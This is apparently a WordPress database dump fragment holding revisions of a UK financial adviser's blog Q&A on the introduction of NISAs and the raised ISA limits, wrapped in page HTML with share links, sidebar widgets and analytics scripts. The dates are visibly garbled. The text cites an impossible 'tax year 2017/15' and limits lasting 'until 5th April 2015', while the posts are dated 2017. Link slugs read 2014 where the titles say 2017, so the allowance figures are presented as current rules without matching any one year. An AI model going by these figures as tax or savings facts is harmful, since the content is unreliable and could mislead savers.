legislation – the ‘biggest shake-up of pensions for over a hundred years’ as he termed it.\n\n&nbsp;\n\nHowever there are also big changes planned for Individual Savings Accounts, with the rules being revised from July 1st this year.\n\n&nbsp;\n\nWe know that a lot of our clients like to use ISAs for their savings and benefit from the tax advantages: this is likely to increase after July 1st. We therefore thought it might be helpful if we answered all the questions clients have been asking us about the proposed changes to the rules and the introduction of NISAs – New Individual Savings Accounts.\n\n&nbsp;\n\n&nbsp;\n\nWhy has the Chancellor made these changes?\n\n&nbsp;\n\nGeorge Osborne described his Budget as one for ‘the makers, the do-ers and the savers.’ He’s long been concerned that the average person in the UK borrows too much and saves too little and these changes are part of his attempt to address that.\n\n&nbsp;\n\nWhat’s he proposing?\n\n&nbsp;\n\nFirstly he’s proposing an increase in the annual ISA limit to £15,000. In the Autumn Statement last year the Chancellor said that the limit for the tax year 2017/15 would be £11,880 but – from July 1st – it will increase to £15,000 and that figure will apply until 5th April 2015, by which time we’ll have had the 2015 Budget speech.\n\n&nbsp;\n\nBut I’ve already contributed my £11,880 for this year…\n\n&nbsp;\n\nNo problem. From July 1st you’ll be able to contribute an additional £3,120 to bring you up to £15,000. If you have contributed £5,940 into a cash ISA, then you’ll be able to contribute an additional £9,060 from July 1st.\n\n&nbsp;\n\nSo a husband and wife can save £30,000 a year in ISAs – or NISAs as we have to call them now?\n\n&nbsp;\n\nYes.\n\n&nbsp;\n\nWill there still be a limit on what I can put into a cash ISA?\n\n&nbsp;\n\nIt used to be the case that up to 50% of the annual allowance could go into a cash ISA but from July 1st that limit disappears. So the only limit will be the overall annual limit.\n\n&nbsp;\n\nCan I move my money from stocks and shares ISAs to cash as I get older/more cautious?\n\n&nbsp;\n\nYes you can. This is another change that will be welcomed by our clients – previously you couldn’t do this, but from July 1st you will be able to.\n\n&nbsp;\n\nWhat about Junior ISAs?\n\n&nbsp;\n\nThere’s good news here as well. The limit for Junior ISAs is increasing to £4,000 a year – and remember that if you are aged between 16 and 18 you can hold a cash ISA, but not a stocks and shares ISA.\n\n&nbsp;\n\nThis means someone between 16 and 18 can pay the full £15,000 into a cash ISA.\n\n&nbsp;\n\nSo all in all this is good news and NISAs will now be much more flexible?\n\n&nbsp;\n\nAbsolutely. We think these changes are really good news and we’d expect NISAs to play a significant part in the financial planning of a lot of our clients. Interestingly though, there’ll probably be a need for more financial planning, not less. If say, a husband and wife have £30,000 in cash ISAs – as opposed to £11,880 under the old rules – then it’s going to be even more important that they’re receiving the very best interest rate on that money.\n\n&nbsp;\n\nSimilarly if you have £15,000 in a stocks and shares ISA – and potentially a lot more as the investments build up over the years – the performance of your fund manager(s) becomes ever more important. So the changes to the ISA rules will probably mean working more closely with your financial advisers.\n\n&nbsp;\n\nAnything else?\n\n&nbsp;\n\nOnly that we’ll be encouraging our clients to use these new allowances: as we’ve always stressed, it makes sense to make use of all the tax free allowances that are available to you.\n\n&nbsp;\n\nIf you have any other questions on the changes to ISAs – or if you’d like any help on working out exactly what you can contribute in the current tax year – then as always don’t hesitate to contact us. We’re only a phone call or an e-mail away.\n\n&nbsp;\n\nWarmest regards\n\n&nbsp;\n\nSam\n\n&nbsp;\n<p style=\"text-align: center;\">THE VALUE OF INVESTMENTS AND INCOME FROM THEM AND MAY GO DOWN. YOU MAY NOT GET BACK THE ORIGINAL AMOUNT INVESTED</p>\n&nbsp;\n\n&nbsp;\n\n</div>\n&nbsp;\n<div class=\"meta-info\">\n\n&nbsp;\n<div class=\"vcard\">\nBy <span class=\"sep\">|</span>Categories: <a title=\"View all posts in Investments\" href=\"../category\" rel=\"category tag\">Investments</a>, <a title=\"View all posts in Wealth Management\" href=\"../category/wealth-management/\" rel=\"category tag\">Wealth Management</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><a title=\"Comment on The New Individual Savings Accounts\" href=\"../new-individual-savings-accounts/\">0 Comments</a></div>\n&nbsp;\n\n</div>\n&nbsp;\n<div class=\"share-box\">\n\n&nbsp;\n<h4></h4>\n&nbsp;\n<ul class=\"social-networks social-networks-dark\">\n<ul class=\"social-networks social-networks-dark\">\n 	<li class=\"facebook\">\n<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/new-individual-savings-accounts/&amp;p[title]=The%20New%20Individual%20Savings%20Accounts\" target=\"_blank\">\nFacebook\n</a>\n<div class=\"popup\">\n\n&nbsp;\n<div class=\"holder\">\n\n&nbsp;\n\nFacebook\n\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"social-networks social-networks-dark\">\n<ul class=\"social-networks social-networks-dark\">\n 	<li class=\"twitter\">\n<a href=\"http://twitter.com/home?status=The+New+Individual+Savings+Accounts%20http://www.equalitywalk.org.uk/new-individual-savings-accounts/\" target=\"_blank\">\nTwitter\n</a>\n<div class=\"popup\">\n\n&nbsp;\n<div class=\"holder\">\n\n&nbsp;\n\nTwitter\n\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"social-networks social-networks-dark\">\n<ul class=\"social-networks social-networks-dark\">\n 	<li class=\"linkedin\">\n<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/new-individual-savings-accounts/&amp;title=The%20New%20Individual%20Savings%20Accounts\" target=\"_blank\">\nLinkedIn\n</a>\n<div class=\"popup\">\n\n&nbsp;\n<div class=\"holder\">\n\n&nbsp;\n\nLinkedIn\n\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"social-networks social-networks-dark\">\n<ul class=\"social-networks social-networks-dark\">\n 	<li class=\"reddit\">\n<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/new-individual-savings-accounts/&amp;title=The%20New%20Individual%20Savings%20Accounts\" target=\"_blank\">\nReddit\n</a>\n<div class=\"popup\">\n\n&nbsp;\n<div class=\"holder\">\n\n&nbsp;\n\nReddit\n\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"social-networks social-networks-dark\">\n<ul class=\"social-networks social-networks-dark\">\n 	<li class=\"tumblr\">\n<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fnew-individual-savings-accounts%2F&amp;name=The+New+Individual+Savings+Accounts&amp;description=We+know+that+a+lot+of+our+clients+like+to+use+ISAs+for+their+savings+and+benefit+from+the+tax+advantages%3A+this+is+likely+to+increase+after+July+1st.+We+therefore+thought+it+might+be+helpful+if+we+answered+all+the+questions+clients+have+been+asking+us+about+the+proposed+changes\" target=\"_blank\">\nTumblr\n</a>\n<div class=\"popup\">\n\n&nbsp;\n<div class=\"holder\">\n\n&nbsp;\n\nTumblr\n\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"social-networks social-networks-dark\">\n<ul class=\"social-networks social-networks-dark\">\n 	<li class=\"google\">\n<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/new-individual-savings-accounts/\" target=\"_blank\">\nGoogle +1\n</a>\n<div class=\"popup\">\n\n&nbsp;\n<div class=\"holder\">\n\n&nbsp;\n\nGoogle +1\n\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"social-networks social-networks-dark\">\n<ul class=\"social-networks social-networks-dark\">\n 	<li class=\"tf-pinterest\">\n<a href=\"#\">\nPinterest\n</a>\n<div class=\"popup\">\n\n&nbsp;\n<div class=\"holder\">\n\n&nbsp;\n\nPinterest\n\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"social-networks social-networks-dark\">\n<ul class=\"social-networks social-networks-dark\">\n 	<li class=\"email\">\n<a href=\"mailto:?subject=The New Individual Savings Accounts&amp;body=http://www.equalitywalk.org.uk/new-individual-savings-accounts/\">\nEmail\n</a>\n<div class=\"popup\">\n\n&nbsp;\n<div class=\"holder\">\n\n&nbsp;\n\nEmail\n\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n\n</div>\n&nbsp;\n<div class=\"about-author\">\n\n&nbsp;\n<div class=\"title\">\n<h2>About the Author:</h2>\n<div class=\"title-sep-container\"></div>\n</div>\n&nbsp;\n<div class=\"about-author-container\"></div>\n&nbsp;\n\n</div>\n<!-- You can start editing here. -->\n\n\n<!-- If comments are open, but there are no comments. -->\n<div id=\"respond\" class=\"comment-respond\">\n\n&nbsp;\n<div class=\"title\">\n<h2></h2>\n<div class=\"title-sep-container\"></div>\n</div>\n<small><a id=\"cancel-comment-reply-link\" style=\"display: none;\" href=\"../new-individual-savings-accounts/\" rel=\"nofollow\">Cancel reply</a></small>\n\n<form id=\"commentform\" class=\"comment-form\" action=\"/\" method=\"post\">&nbsp;\n<div id=\"comment-input\"><input id=\"author\" class=\"input-name\" tabindex=\"1\" name=\"author\" size=\"22\" type=\"text\" value=\"\" placeholder=\"Name (required)\" /><input id=\"email\" class=\"input-email\" tabindex=\"2\" name=\"email\" size=\"22\" type=\"text\" value=\"\" placeholder=\"Email (required)\" /></div>\n&nbsp;\n<div id=\"comment-textarea\"></div>\n<p class=\"form-submit\">\n<input id=\"comment-submit\" name=\"submit\" type=\"submit\" value=\"Post Comment\" /><input id=\"comment_post_ID\" name=\"comment_post_ID\" type=\"hidden\" value=\"8425\" /></p>\n&nbsp;\n<p style=\"display: none;\"><input id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" type=\"hidden\" value=\"62bc530ba8\" /></p>\n&nbsp;\n<p style=\"display: none;\"><input id=\"ak_js\" name=\"ak_js\" type=\"hidden\" value=\"97\" /></p>\n&nbsp;\n\n</form></div>\n<!-- #respond -->\n<script type=\"text/javascript\"><![CDATA[ jQuery(document).ready(function () { jQuery(\'#commentform\').submit(function () { _gaq.push( [\'_setAccount\', \'UA-10958181-3\'], [\'_trackEvent\', \'comment\', \'submit\'] ); }); }); ]]></script>\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;\n<div id=\"sidebar\" style=\"float: right;\">\n\n&nbsp;\n<div id=\"text-24\" class=\"widget widget_text\">\n<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big>\n\nsubscribers who get new content from us on a monthly basis</center>\n<a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" target=\"_blank\"><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>\n<p>&#13;\n		</div>\n<div id=\"recent_works-widget-2\" class=\"widget recent_works\">\n<div class=\"heading\">\n<p>New Guides</p>\n</div>\n<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>\n<p>&#13;\n&#13;\n		</div>\n<div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">\n<div class=\"tab-holder\"><p>&#13;\n			</p>\n<div class=\"tab-hold tabs-wrapper\"><p>&#13;\n				</p>\n<ul id=\"tabs\" class=\"tabset tabs\">\n<li><a href=\"#tab-popular\">Popular</a></li>\n<p>&#13;\n															</p>\n<li><a href=\"#tab-recent\">Recent</a></li>\n<p>&#13;\n														</ul>\n<div class=\"tab-box tabs-container\"><p>&#13;\n										</p>\n<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\"><p>&#13;\n												</p>\n<ul class=\"news-list\">\n<li>&#13;\n<br />\n<div class=\"image\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\n																			</a>&#13;\n								</div>\n<p>&#13;\n																</p>\n<div class=\"post-holder\"><p>&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\n									</p>\n<div class=\"meta\">&#13;\n										October 12th, 2017									</div>\n<p>&#13;\n								</div>\n<p>&#13;\n							</li>\n<p>&#13;\n														</p>\n<li>&#13;\n<br />\n<div class=\"image\">&#13;\n									<a href=\"../best-annuity-rates/\">&#13;\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>\n<p>&#13;\n																</p>\n<div class=\"post-holder\"><p>&#13;\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\n									</p>\n<div class=\"meta\">&#13;\n										March 21st, 2017									</div>\n<p>&#13;\n								</div>\n<p>&#13;\n							</li>\n<p>&#13;\n														</p>\n<li>&#13;\n<br />\n<div class=\"post-holder\"><p>&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									</p>\n<div class=\"meta\">&#13;\n										September 10th, 2017									</div>\n<p>&#13;\n								</div>\n<p>&#13;\n							</li>\n<p>&#13;\n														</p>\n<li>&#13;\n<br />\n<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>\n<p>&#13;\n																</p>\n<div class=\"post-holder\"><p>&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									</p>\n<div class=\"meta\">&#13;\n										September 18th, 2017									</div>\n<p>&#13;\n								</div>\n<p>&#13;\n							</li>\n<p>&#13;\n														</p>\n<li>&#13;\n<br />\n<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>\n<p>&#13;\n																</p>\n<div class=\"post-holder\"><p>&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									</p>\n<div class=\"meta\">&#13;\n										September 5th, 2017									</div>\n<p>&#13;\n								</div>\n<p>&#13;\n							</li>\n<p>&#13;\n													</ul>\n</div>\n<p>&#13;\n															</p>\n<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\"><p>&#13;\n												</p>\n<ul class=\"news-list\">\n<li>&#13;\n<br />\n<div class=\"image\">&#13;\n									<a href=\"../new-individual-savings-accounts/\">&#13;\n																			</a>&#13;\n								</div>\n<p>&#13;\n																</p>\n<div class=\"post-holder\"><p>&#13;\n									<a href=\"../new-individual-savings-accounts/\">The New Individual Savings Accounts</a>&#13;\n									</p>\n<div class=\"meta\">&#13;\n										May 14th, 2017									</div>\n<p>&#13;\n								</div>\n<p>&#13;\n							</li>\n<p>&#13;\n														</p>\n<li>&#13;\n<br />\n<div class=\"image\">&#13;\n									<a href=\"../get-auto-enrolment/\">&#13;\n																			</a>&#13;\n								</div>\n<p>&#13;\n																</p>\n<div class=\"post-holder\"><p>&#13;\n									<a href=\"../get-auto-enrolment/\">How To Get The Most From Auto-Enrolment</a>&#13;\n									</p>\n<div class=\"meta\">&#13;\n										May 12th, 2017									</div>\n<p>&#13;\n								</div>\n<p>&#13;\n							</li>\n<p>&#13;\n														</p>\n<li>&#13;\n<br />\n<div class=\"image\">&#13;\n									<a href=\"../may-2014-stock-market-bulletin/\">&#13;\n																			</a>&#13;\n								</div>\n<p>&#13;\n																</p>\n<div class=\"post-holder\"><p>&#13;\n									<a href=\"../may-2014-stock-market-bulletin/\">May 2017 Stock Market Bulletin</a>&#13;\n									</p>\n<div class=\"meta\">&#13;\n										May 7th, 2017									</div>\n<p>&#13;\n								</div>\n<p>&#13;\n							</li>\n<p>&#13;\n														</p>\n<li>&#13;\n<br />\n<div class=\"image\">&#13;\n									<a href=\"../bank-left-stranded-without-financial-adviser/\">&#13;\n																			</a>&#13;\n								</div>\n<p>&#13;\n																</p>\n<div class=\"post-holder\"><p>&#13;\n									<a href=\"../bank-left-stranded-without-financial-adviser/\">Has Your Bank Left You Stranded Without a Financial Adviser</a>&#13;\n									</p>\n<div class=\"meta\">&#13;\n										April 7th, 2017									</div>\n<p>&#13;\n								</div>\n<p>&#13;\n							</li>\n<p>&#13;\n														</p>\n<li>&#13;\n<br />\n<div class=\"image\">&#13;\n									<a href=\"../april-2014-stock-market-bulletin/\">&#13;\n																			</a>&#13;\n								</div>\n<p>&#13;\n																</p>\n<div class=\"post-holder\"><p>&#13;\n									<a href=\"../april-2014-stock-market-bulletin/\">April 2017 Stock Market Bulletin</a>&#13;\n									</p>\n<div class=\"meta\">&#13;\n										April 2nd, 2017									</div>\n<p>&#13;\n								</div>\n<p>&#13;\n							</li>\n<p>&#13;\n													</ul>\n</div>\n<p>&#13;\n														</div>\n<p>&#13;\n			</div>\n<p>&#13;\n		</div>\n<p>&#13;\n		</div>\n<div id=\"categories-3\" class=\"widget widget_categories\">\n<div class=\"heading\">\n<p>Post Categories</p>\n</div>\n<p><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (1)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (3)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (7)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"1\">Wealth Management  (16)</option></select><script type=\"text/javascript\"><![CDATA[\n/* <![CDATA[ */ var dropdown = document.getElementById(\"cat\"); function onCatChange() { if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\n		}\n	}\n	dropdown.onchange = onCatChange;\n/* ]]]]><![CDATA[> */\n]]></script></a></div>\n<div id=\"social_links-widget-2\" class=\"widget social_links\">\n<div class=\"heading\">\n\nGet Social\n\n</div>\n<ul class=\"social-networks clearfix\">\n<ul class=\"social-networks clearfix\">\n 	<li class=\"rss\">\n<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\">RSS</a>\n<div class=\"popup\">\n\n&nbsp;\n<div class=\"holder\">\n\n&nbsp;\n\nRSS\n\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"social-networks clearfix\">\n<ul class=\"social-networks clearfix\">\n 	<li class=\"twitter\">\n<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\">Twitter</a>\n<div class=\"popup\">\n\n&nbsp;\n<div class=\"holder\">\n\n&nbsp;\n\nTwitter\n\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n\n</div>\n<div id=\"text-23\" class=\"widget widget_text\">\n<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\" /></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>\n<p>&#13;\n		</div>\n</div>\n<p>&#13;\n		</div>\n<p>&#13;\n	</div>\n<p>&#13;\n				</p>\n<footer class=\"footer-area\">\n<div class=\"avada-row\"><p>&#13;\n			</p>\n<section class=\"columns columns-4\">\n<article class=\"col\">\n<div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">\n<p>Our Latest Posts</p>\n<ul>\n<li>&#13;\n				<a href=\"../new-individual-savings-accounts/\">The New Individual Savings Accounts</a>&#13;\n						</li>\n<p>&#13;\n					</p>\n<li>&#13;\n				<a href=\"../get-auto-enrolment/\">How To Get The Most From Auto-Enrolment</a>&#13;\n						</li>\n<p>&#13;\n					</p>\n<li>&#13;\n				<a href=\"../may-2014-stock-market-bulletin/\">May 2017 Stock Market Bulletin</a>&#13;\n						</li>\n<p>&#13;\n					</p>\n<li>&#13;\n				<a href=\"../bank-left-stranded-without-financial-adviser/\">Has Your Bank Left You Stranded Without a Financial Adviser</a>&#13;\n						</li>\n<p>&#13;\n				</ul>\n<div style=\"clear:both;\"/></div>\n</article>\n<article class=\"col\">\n<div id=\"text-13\" class=\"footer-widget-col widget_text\">\n<p>Equity SMART</p>\n<div class=\"textwidget\">\n<p>Established for over 20 years we work with individuals, families and owner managed businesses countrywide, helping them organise; plan; protect and achieve the future they choose, through \"hands on\" objective and realistic financial advice they can depend on.</p>\n<p>&#13;\n</div>\n<p>&#13;\n		</p>\n<div style=\"clear:both;\"/></div>\n</article>\n<article class=\"col\">\n<div id=\"text-22\" class=\"footer-widget-col widget_text\">\n<p>Download FREE Guides</p>\n<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/1435eb973f72a2%3A125d9572eb46dc/5753952654065664/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../w3QPpbD3DJXcyqPrBaexcUOnTpQKlOX0XuzNYejlD3Hwl1wrM5qbyjoyp4eUJt-wEdlJsAojFjru39Y0ZjrDnA_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-689.js\"/></div>\n<p>&#13;\n		</p>\n<div style=\"clear:both;\"/></div>\n</article>\n<article class=\"col last\">\n<div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\">\n<p>Contact Info</p>\n<div class=\"contact-info-container\"><p>&#13;\n				</p>\n<p class=\"address\">Manchester &amp; London</p>\n<p>&#13;\n		&#13;\n				</p>\n<p class=\"phone\">Phone: </p>\n<p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				</p>\n<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>\n<p>&#13;\n		&#13;\n				&#13;\n				</div>\n<p>&#13;\n		</p>\n<div style=\"clear:both;\"/></div>\n<div id=\"social_links-widget-3\" class=\"footer-widget-col social_links\">\n<p>Connect With Us</p>\n<ul class=\"social-networks clearfix\">\n<li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"\">RSS</a>&#13;\n<br />\n<div class=\"popup\"><p>&#13;\n					</p>\n<div class=\"holder\"><p>&#13;\n						</p>\n<p>RSS</p>\n<p>&#13;\n					</div>\n<p>&#13;\n				</div>\n<p>&#13;\n			</li>\n<p>&#13;\n												</p>\n<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"\">Twitter</a>&#13;\n<br />\n<div class=\"popup\"><p>&#13;\n					</p>\n<div class=\"holder\"><p>&#13;\n						</p>\n<p>Twitter</p>\n<p>&#13;\n					</div>\n<p>&#13;\n				</div>\n<p>&#13;\n			</li>\n<p>&#13;\n																																																								</ul>\n<div style=\"clear:both;\"/></div>\n</article>\n</section>\n</div>\n<p>&#13;\n	</footer>\n<footer id=\"footer\"/><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\n/* <![CDATA[ */ var _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"}; /* ]]]]><![CDATA[> */\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\n/* <![CDATA[ */ var iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"}; /* ]]]]><![CDATA[> */\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\n/* <![CDATA[ */\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\n/* ]]]]><![CDATA[> */\n]]></script><script src=\"../wp-content/themes/Avada/js/main.js\" type=\"text/javascript\">// <![CDATA[\n<script type=\"text/javascript\" src=\"../scripts.hellobar.com/565e6e29d8b6bfca77549154aee8b14f23536824.js\"/></body></p>\n// ]]></script></div>\n</div>\n</div>\n</div>\n</div>\n</div>','The New Individual Savings Accounts','Read about','inherit','closed','closed','','84-autosave-v1','','','2017-09-21 17:38:35','2017-09-21 17:38:35','',84,'http://www.equalitywalk.org.uk/84-autosave-v1',0,'revision','',0),(333,1,'2017-09-21 17:40:06','2017-09-21 17:40:06','<div id=\"wrapper\">\r\n<div id=\"main\" class=\"clearfix \">\r\n<div class=\"avada-row\"><span class=\"entry-title\" style=\"display: none;\">The New Individual Savings Account</span>\r\n<div id=\"post-8425\" class=\"post-8425 post type-post status-publish format-standard has-post-thumbnail hentry category-investments category-wealth-management post\">\r\n<div class=\"post-content\">\r\n\r\n<strong>The New Individual Savings Accounts – Q&amp;A</strong>\r\n\r\n…Or NISAs as we must learn to call them.\r\n\r\nMost of the headlines surrounding George Osborne’s recent Budget focused on the far-reaching changes he made to pensions legislation – the ‘biggest shake-up of pensions for over a hundred years’ as he termed it.\r\n\r\nHowever there are also big changes planned for Individual Savings Accounts, with the rules being revised from July 1st this year.\r\n\r\nWe know that a lot of our clients like to use ISAs for their savings and benefit from the tax advantages: this is likely to increase after July 1st. We therefore thought it might be helpful if we answered all the questions clients have been asking us about the proposed changes to the rules and the introduction of NISAs – New Individual Savings Accounts.\r\n\r\n&nbsp;\r\n<h4>Why has the Chancellor made these changes?</h4>\r\nGeorge Osborne described his Budget as one for ‘the makers, the do-ers and the savers.’ He’s long been concerned that the average person in the UK borrows too much and saves too little and these changes are part of his attempt to address that.\r\n\r\n&nbsp;\r\n\r\n<strong>What’s he proposing?</strong>\r\n\r\nFirstly he’s proposing an increase in the annual ISA limit to £15,000. In the Autumn Statement last year the Chancellor said that the 